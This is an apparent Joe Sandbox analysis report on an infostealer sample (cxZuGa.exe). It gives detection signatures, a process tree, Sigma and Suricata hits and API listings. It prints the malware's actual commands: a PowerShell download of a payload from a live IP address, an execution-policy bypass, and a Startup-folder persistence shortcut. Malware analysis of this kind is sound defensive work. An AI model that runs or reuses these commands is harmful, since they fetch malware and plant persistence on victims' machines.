Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
cxZuGa.exe

Overview

General Information

Sample name:cxZuGa.exe
Analysis ID:1583285
MD5:243e64fa2b25bba3e6c710de1bdd4b0c
SHA1:a5d90ba12791750258295c3601f55bc170badaa4
SHA256:cb284dd8a8bf729793df1cac357478c0bed3d011ae5f2b9223327ce9973f2172
Tags:exeinfostealermalwareuser-Joker
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Icon mismatch, binary includes an icon from a different legit application in order to fool users
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Suricata IDS alerts for network traffic
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Bypasses PowerShell execution policy
Drops PE files to the user root directory
Drops PE files with a suspicious file extension
Powershell drops PE file
Sigma detected: Execution from Suspicious Folder
Sigma detected: Execution of Powershell Script in Public Folder
Sigma detected: Parent in Public Folder Suspicious Process
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Invoke-WebRequest Execution
Sigma detected: WScript or CScript Dropper
Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
AV process strings found (often used to terminate AV products)
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: PowerShell Web Download
Sigma detected: Suspicious Invoke-WebRequest Execution With DirectIP
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Process Tree

  • System is w10x64
  • cxZuGa.exe (PID: 6484 cmdline: "C:\Users\user\Desktop\cxZuGa.exe" MD5: 243E64FA2B25BBA3E6C710DE1BDD4B0C)
    • powershell.exe (PID: 3752 cmdline: powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/TSKUVpnJ" -OutFile "C:\Users\Public\Guard.exe"" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 3220 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 940 cmdline: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 1532 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • Guard.exe (PID: 6088 cmdline: "C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au3 MD5: 18CE19B57F43CE0A5AF149C96AECC685)
        • cmd.exe (PID: 5828 cmdline: cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & echo URL="C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 5776 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • wscript.exe (PID: 5688 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • SwiftWrite.pif (PID: 432 cmdline: "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif" "C:\Users\user\AppData\Local\WordGenius Technologies\G" MD5: 18CE19B57F43CE0A5AF149C96AECC685)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

System Summary

barindex
Sigma detected: Execution from Suspicious Folder
Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au3 , CommandLine: "C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au3 , CommandLine|base64offset|contains: , Image: C:\Users\Public\Guard.exe, NewProcessName: C:\Users\Public\Guard.exe, OriginalFileName: C:\Users\Public\Guard.exe, ParentCommandLine: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 940, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au3 , ProcessId: 6088, ProcessName: Guard.exe
Sigma detected: Execution of Powershell Script in Public Folder
Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1", CommandLine: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\cxZuGa.exe", ParentImage: C:\Users\user\Desktop\cxZuGa.exe, ParentProcessId: 6484, ParentProcessName: cxZuGa.exe, ProcessCommandLine: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1", ProcessId: 940, ProcessName: powershell.exe
Sigma detected: Parent in Public Folder Suspicious Process
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & echo URL="C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & exit, CommandLine: cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & echo URL="C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & exit, CommandLine|base64offset|contains: rg, Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au3 , ParentImage: C:\Users\Public\Guard.exe, ParentProcessId: 6088, ParentProcessName: Guard.exe, ProcessCommandLine: cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & echo URL="C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & exit, ProcessId: 5828, ProcessName: cmd.exe
Sigma detected: Script Interpreter Execution From Suspicious Folder
Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1", CommandLine: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\cxZuGa.exe", ParentImage: C:\Users\user\Desktop\cxZuGa.exe, ParentProcessId: 6484, ParentProcessName: cxZuGa.exe, ProcessCommandLine: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1", ProcessId: 940, ProcessName: powershell.exe
Sigma detected: Suspicious Invoke-WebRequest Execution
Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/TSKUVpnJ" -OutFile "C:\Users\Public\Guard.exe"", CommandLine: powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/TSKUVpnJ" -OutFile "C:\Users\Public\Guard.exe"", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\cxZuGa.exe", ParentImage: C:\Users\user\Desktop\cxZuGa.exe, ParentProcessId: 6484, ParentProcessName: cxZuGa.exe, ProcessCommandLine: powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/TSKUVpnJ" -OutFile "C:\Users\Public\Guard.exe"", ProcessId: 3752, ProcessName: powershell.exe
Sigma detected: WScript or CScript Dropper
Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" , ProcessId: 5688, ProcessName: wscript.exe
Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
Source: File createdAuthor: Florian Roth (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3752, TargetFilename: C:\Users\Public\Guard.exe
Sigma detected: Change PowerShell Policies to an Insecure Level
Source: Process startedAuthor: frack113: Data: Command: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1", CommandLine: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\cxZuGa.exe", ParentImage: C:\Users\user\Desktop\cxZuGa.exe, ParentProcessId: 6484, ParentProcessName: cxZuGa.exe, ProcessCommandLine: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1", ProcessId: 940, ProcessName: powershell.exe
Sigma detected: Execution of Suspicious File Type Extension
Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif" "C:\Users\user\AppData\Local\WordGenius Technologies\G", CommandLine: "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif" "C:\Users\user\AppData\Local\WordGenius Technologies\G", CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif, NewProcessName: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif, OriginalFileName: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif, ParentCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" , ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 5688, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif" "C:\Users\user\AppData\Local\WordGenius Technologies\G", ProcessId: 432, ProcessName: SwiftWrite.pif
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3752, TargetFilename: C:\Users\Public\Guard.exe
Sigma detected: PowerShell Web Download
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/TSKUVpnJ" -OutFile "C:\Users\Public\Guard.exe"", CommandLine: powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/TSKUVpnJ" -OutFile "C:\Users\Public\Guard.exe"", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\cxZuGa.exe", ParentImage: C:\Users\user\Desktop\cxZuGa.exe, ParentProcessId: 6484, ParentProcessName: cxZuGa.exe, ProcessCommandLine: powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/TSKUVpnJ" -OutFile "C:\Users\Public\Guard.exe"", ProcessId: 3752, ProcessName: powershell.exe
Sigma detected: Suspicious Invoke-WebRequest Execution With DirectIP
Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/TSKUVpnJ" -OutFile "C:\Users\Public\Guard.exe"", CommandLine: powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/TSKUVpnJ" -OutFile "C:\Users\Public\Guard.exe"", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\cxZuGa.exe", ParentImage: C:\Users\user\Desktop\cxZuGa.exe, ParentProcessId: 6484, ParentProcessName: cxZuGa.exe, ProcessCommandLine: powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/TSKUVpnJ" -OutFile "C:\Users\Public\Guard.exe"", ProcessId: 3752, ProcessName: powershell.exe
Sigma detected: Usage Of Web Request Commands And Cmdlets
Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/TSKUVpnJ" -OutFile "C:\Users\Public\Guard.exe"", CommandLine: powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/TSKUVpnJ" -OutFile "C:\Users\Public\Guard.exe"", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\cxZuGa.exe", ParentImage: C:\Users\user\Desktop\cxZuGa.exe, ParentProcessId: 6484, ParentProcessName: cxZuGa.exe, ProcessCommandLine: powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/TSKUVpnJ" -OutFile "C:\Users\Public\Guard.exe"", ProcessId: 3752, ProcessName: powershell.exe
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" , ProcessId: 5688, ProcessName: wscript.exe
Sigma detected: Non Interactive PowerShell Process Spawned
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/TSKUVpnJ" -OutFile "C:\Users\Public\Guard.exe"", CommandLine: powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/TSKUVpnJ" -OutFile "C:\Users\Public\Guard.exe"", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\cxZuGa.exe", ParentImage: C:\Users\user\Desktop\cxZuGa.exe, ParentProcessId: 6484, ParentProcessName: cxZuGa.exe, ProcessCommandLine: powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/TSKUVpnJ" -OutFile "C:\Users\Public\Guard.exe"", ProcessId: 3752, ProcessName: powershell.exe

Data Obfuscation

barindex
Sigma detected: Drops script at startup location
Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\SysWOW64\cmd.exe, ProcessId: 5828, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url

Suricata Signatures

TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-01-02T10:54:56.815357+010018100032Potentially Bad Traffic139.99.188.12480192.168.2.549704TCP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-01-02T10:54:56.815327+010018100001Potentially Bad Traffic192.168.2.549704139.99.188.12480TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Multi AV Scanner detection for submitted file
Source: cxZuGa.exeReversingLabs: Detection: 44%
Source: cxZuGa.exeVirustotal: Detection: 61%Perma Link
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.5% probability
Source: cxZuGa.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\cxZuGa.exeCode function: 0_2_00007FF7EC19C7C0 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,0_2_00007FF7EC19C7C0
Source: C:\Users\user\Desktop\cxZuGa.exeCode function: 0_2_00007FF7EC162F50 FindFirstFileExW,0_2_00007FF7EC162F50
Source: C:\Users\user\Desktop\cxZuGa.exeCode function: 0_2_00007FF7EC1AA874 FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00007FF7EC1AA874
Source: C:\Users\user\Desktop\cxZuGa.exeCode function: 0_2_00007FF7EC1AA350 FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,0_2_00007FF7EC1AA350
Source: C:\Users\user\Desktop\cxZuGa.exeCode function: 0_2_00007FF7EC1A6428 FindFirstFileW,FindNextFileW,FindClose,0_2_00007FF7EC1A6428
Source: C:\Users\user\Desktop\cxZuGa.exeCode function: 0_2_00007FF7EC1AA4F8 FindFirstFileW,FindNextFileW,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,0_2_00007FF7EC1AA4F8
Source: C:\Users\user\Desktop\cxZuGa.exeCode function: 0_2_00007FF7EC19BC70 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00007FF7EC19BC70
Source: C:\Users\user\Desktop\cxZuGa.exeCode function: 0_2_00007FF7EC19B7C0 FindFirstFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00007FF7EC19B7C0
Source: C:\Users\user\Desktop\cxZuGa.exeCode function: 0_2_00007FF7EC1A71F4 FindFirstFileW,FindClose,0_2_00007FF7EC1A71F4
Source: C:\Users\user\Desktop\cxZuGa.exeCode function: 0_2_00007FF7EC1A72A8 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,0_2_00007FF7EC1A72A8
Source: C:\Users\Public\Guard.exeCode function: 6_2_00C94005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,6_2_00C94005
Source: C:\Users\Public\Guard.exeCode function: 6_2_00C9494A GetFileAttributesW,FindFirstFileW,FindClose,6_2_00C9494A
Source: C:\Users\Public\Guard.exeCode function: 6_2_00C9C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,6_2_00C9C2FF
Source: C:\Users\Public\Guard.exeCode function: 6_2_00C9CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,6_2_00C9CD9F
Source: C:\Users\Public\Guard.exeCode function: 6_2_00C9CD14 FindFirstFileW,FindClose,6_2_00C9CD14
Source: C:\Users\Public\Guard.exeCode function: 6_2_00C9F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,6_2_00C9F5D8
Source: C:\Users\Public\Guard.exeCode function: 6_2_00C9F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,6_2_00C9F735
Source: C:\Users\Public\Guard.exeCode function: 6_2_00C9FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,6_2_00C9FA36
Source: C:\Users\Public\Guard.exeCode function: 6_2_00C93CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,6_2_00C93CE2
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 11_2_00654005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,11_2_00654005
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 11_2_0065494A GetFileAttributesW,FindFirstFileW,FindClose,11_2_0065494A
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 11_2_0065C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,11_2_0065C2FF
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 11_2_0065CD14 FindFirstFileW,FindClose,11_2_0065CD14
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 11_2_0065CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,11_2_0065CD9F
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 11_2_0065F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,11_2_0065F5D8
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 11_2_0065F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,11_2_0065F735
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 11_2_0065FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,11_2_0065FA36
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 11_2_00653CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,11_2_00653CE2

Networking

barindex
Suricata IDS alerts for network traffic
Source: Network trafficSuricata IDS: 1810000 - Severity 1 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.5:49704 -> 139.99.188.124:80
Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 02 Jan 2025 09:54:56 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30Last-Modified: Mon, 16 Dec 2024 15:40:22 GMTETag: "da2a8-62964ffa303b5"Accept-Ranges: bytesContent-Length: 893608Keep-Alive: timeout=5, max=100Connection: Keep-AliveData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 16 73 44 90 52 12 2a c3 52 12 2a c3 52 12 2a c3 14 43 cb c3 50 12 2a c3 cc b2 ed c3 53 12 2a c3 5f 40 f5 c3 61 12 2a c3 5f 40 ca c3 e3 12 2a c3 5f 40 cb c3 67 12 2a c3 5b 6a a9 c3 5b 12 2a c3 5b 6a b9 c3 77 12 2a c3 52 12 2b c3 72 10 2a c3 e7 8c c0 c3 02 12 2a c3 e7 8c f5 c3 53 12 2a c3 5f 40 f1 c3 53 12 2a c3 52 12 bd c3 50 12 2a c3 e7 8c f4 c3 53 12 2a c3 52 69 63 68 52 12 2a c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 f1 5f 70 5a 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0c 00 00 e8 08 00 00 d8 04 00 00 00 00 00 fa 7f 02 00 00 10 00 00 00 00 09 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 f0 0d 00 00 04 00 00 15 cd 0d 00 02 00 40 80 00 00 40 00 00 10 00 00 00 00 40 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 cc d0 0b 00 7c 01 00 00 00 90 0c 00 50 d7 00 00 00 00 00 00 00 00 00 00 00 86 0d 00 a8 1c 00 00 00 70 0d 00 ac 71 00 00 90 3b 09 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 5b 0a 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 09 00 84 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 b1 e7 08 00 